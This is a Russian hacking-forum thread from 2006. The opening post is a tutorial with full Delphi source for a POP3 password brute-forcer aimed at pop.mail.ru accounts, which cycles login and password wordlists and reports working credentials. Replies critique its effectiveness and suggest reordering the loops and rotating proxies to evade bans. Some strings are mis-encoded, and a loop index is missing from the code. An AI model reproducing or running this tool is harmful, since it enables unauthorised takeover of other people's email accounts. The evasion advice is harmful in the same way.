(Статья) Свой брут для почты

Discussion in 'Уязвимости Mail-сервисов' started by Paranoik, 2 Jul 2006.

  1. Paranoik

    Paranoik Elder - Старейшина

    Joined:
    23 Jun 2006
    Messages:
    0
    Likes Received:
    25
    Reputations:
    4
    Простой перебор – глупейшее занятие, отнимающее много времени, но иногда по другому просто не как. Поэтому я и решил написать статейку, на примере взломщика почтовых ящиков, брута. Работу с почтовым ящиком построим на основе библиотеки Indy. Я буду работать в Delphi 7, где библиотека Indy является уже встроенной, так же как и для Delphi 6, а для более старых версии ее придется установить отдельно.

    И так, приступим. Зайдите в делфу и уже на готовую пустую форму киньте четыре компонента TLabel. В свойство Caption каждого TLabel’а впишите: для первого – ‘Файл с логинами’, для второго – ‘Файл с паролями’, для третьего – ‘Адрес сервера’ и для четвертого – ‘Порт’. Теперь бросьте на форму четыре компонента TEdit. В свойстве Text каждого из них пишем: для первого – ‘logins.txt’, для второго – ‘passwords.txt’, для третьего – ‘pop.mail.ru’ и для четвертого – ‘110’. Теперь бросьте на форму кнопку, в которой свойство Caption измените на ‘Начать!’ и самое главное IdPOP31 с вкладки Indy Clients – компонент для работы по протоколу POP3.

    Для большей солидарности можно бросить на форму еще и IdAntiFreeze с вкладки Indy Misc. Это компонент, который следит за тем, чтобы программа не зависала в ожидании ответа при работе с портом.

    Теперь расположите все элементы которые мы поместили на форму, как вашей душе угодно. Скажу только одно, каждый Lable, тобишь 1,2,3… соответствует компонентам Edit, а точнее Label1 где Caption = Файл с логинами соответствует Edit1, так как именно в Edit1 будет указываться имя файла с логинами, ну и так далее… Надеюсь поймете.

    У меня получилось вот так:
    (рис. 1)

    Теперь начинаем писать программный код. Создадим обработчик события OnClick для кнопки которую мы бросили на форму и повесим на него следующий код:

    procedure TForm1.Button2Click(Sender: TObject);
    var
    LoginStrings, PassStrings: TStrings;
    i, j: Integer;
    begin
    LoginStrings:=TStringList.Create;
    PassStrings:=TStringList.Create;
    LoginStrings.LoadFromFile(Edit1.Text);
    PassStrings.LoadFromFile(Edit2.Text);
    IdPOP31.Host := Edit3.Text;
    IdPOP31.Port := StrToInt(Edit4.Text);
    for i:=0 to LoginStrings.Count-1 do
    for j:=0 to PassStrings.Count-1 do
    begin
    IdPOP31.Username := LoginStrings.Strings;
    IdPOP31.Password := PassStrings.Strings[j];
    try
    IdPOP31.Connect;
    except
    end;
    if IdPOP31.Connected then
    begin
    Application.MessageBox(PChar('Èìÿ:'+LoginStrings.Strings+' Ïàðîëü:'+PassStrings.Strings[j]), 'Ïàðîëü íàéäåí!');
    IdPOP31.Disconnect;
    end;
    end;
    LoginStrings.Free;
    PassStrings.Free;
    end;


    Ну вот практически и все. Комментировать весь программный код я не буду, так как хз, неохота уже.

    Теперь откомпилируйте проект, сохраните его куда нить в отдельную папку. И в этой же папке с ексешником нашей программы создайте два текстовых файла. Один под названием, как вы уже догадываетесь logins.txt, а второй passwords.txt соответственно. Теперь забейте их, логинс – Никами, а пас – паролями, сохраните.

    Вот теперь все! Можете запускать свой почтовый Брут и тестировать его.
     
    13 people like this.
  2. Paranoik

    Paranoik Elder - Старейшина

    Joined:
    23 Jun 2006
    Messages:
    0
    Likes Received:
    25
    Reputations:
    4
    Совсем забыл (рис. 1)
    [​IMG]

    И сам исходник проги...
    Качаем сдесь...

    ==========
    С уважением Кирилл
     
  3. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    я бы сказал, что это даже не статья )) конечно молодец что старался писал. Для новичков пойдет. Да и в инете полным полно таких вот мануалов.
     
  4. Paranoik

    Paranoik Elder - Старейшина

    Joined:
    23 Jun 2006
    Messages:
    0
    Likes Received:
    25
    Reputations:
    4
    Но все таки... сам ведь написал))) :mad: :D
     
    1 person likes this.
  5. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Можно самому писать много глупостей! Но статья не плохая...
     
  6. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    плохая статья. больше похоже на вырезку из чудо-книги "Delphi глазами хакера". на месте автора я бы лучше поэксперементировал с нормальным брутом через библеотеку винсокс (все-таки быстрее и понятнее как работает) и посмотрел бы как там бан по ип осуществляется... возможно расмотрел бы брут через веб-интерфейс.
     
  7. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Как и в прошлой статье автора "(Статья) Пишем флуд для чата http://chat.scn.ru/" могу только повтарится...
    Твоя статья похожа на кулинарный рецепт, типа : два яйца бросим сюда, лучёк туда, получем амлет!
    В нашем деле так нельзя "ты мне мясо! Мясо дай!". Создаётся мнение, что ты сам не понимаешь "как это работает".
    Если уж ты пишишь статью, то хоть какие-то основные строки кода должен объяснить.

    То что ты написал это сам, своими руками, возможно даже додумался до этого сам (узнав про компоненты), не означает, что это нельзя назвать "баяном". т.к. подобных статей, исходников в инете НАВАЛОМ!
    Да и брут работать не будет, потому-что при большом кол-ве попыток угадать пас, тебя просто забанят.
    В прошлый раз я не стал ставить минус, т.к. дейсвительно новичёк (да и там код по труднее), но думал похожего не будет...

    Мне кажется, такого рода поощрения плохо сказываются на ачате, ибо таких статей может стать из-за этого больше.
     
    #7 fucker"ok, 3 Jul 2006
    Last edited: 3 Jul 2006
  8. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    Paranoik, если ты брутишь список логинов и словарь пассов к ним то разумнее было бы во внешнем цикле перебирать пассы а логины во внутреннем.

    ZaCo, ну вот возьми и поэксперементируй с нормальным брутом через библеотеку винсокс и посмотри как там бан по ип осуществляется а мы почитаем твои "умнячие" статьи.
     
  9. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    2Rabid Rabbit тут даже таймаут поставить нельзя
     
  10. n0th1ng

    n0th1ng New Member

    Joined:
    27 Jun 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    да стастья неплохая не устал писать :)
     
  11. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Молодец, только когда копируешь чтолибо из Делфи, то следи за кодировкой чтобы не получалось, то есть где есть текст русский то поправляй

    то есть где есть текст русский то поправляй
     
  12. AndreyShe

    AndreyShe Elder - Старейшина

    Joined:
    20 Feb 2008
    Messages:
    0
    Likes Received:
    3
    Reputations:
    -2
    Для новичков нормально.
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    Хех .. за то что сам писал -молодец. Спасибо. Некоторым поможет.

    Но. Всякие бруты для почтовых сервисов... а тем более брут через pop3 протокол стали бояном уже очень давно .. со времен выхода в свет Brutus AET2 /
    Может хватит искать золотое руно и золото Эльдорадо?
    НИЧЕГО сбрутить таким образом нельзя или можно -но придется использовать миллион проксиков, чтоб на каждой 10-ой попытке менять проксик(Да и не факт что бан не последует просто за коннекты неудачные к аккаунту ) и ждать конца брута миилирд лет (если конечно пасс не -123123 - но тогда толк от такого мыла? )
    Кто то говорил ,что через веб-интнрфейс брутить кошерно щас -но и это тоже прикрыли.. наверняка -несколько попыток и бан..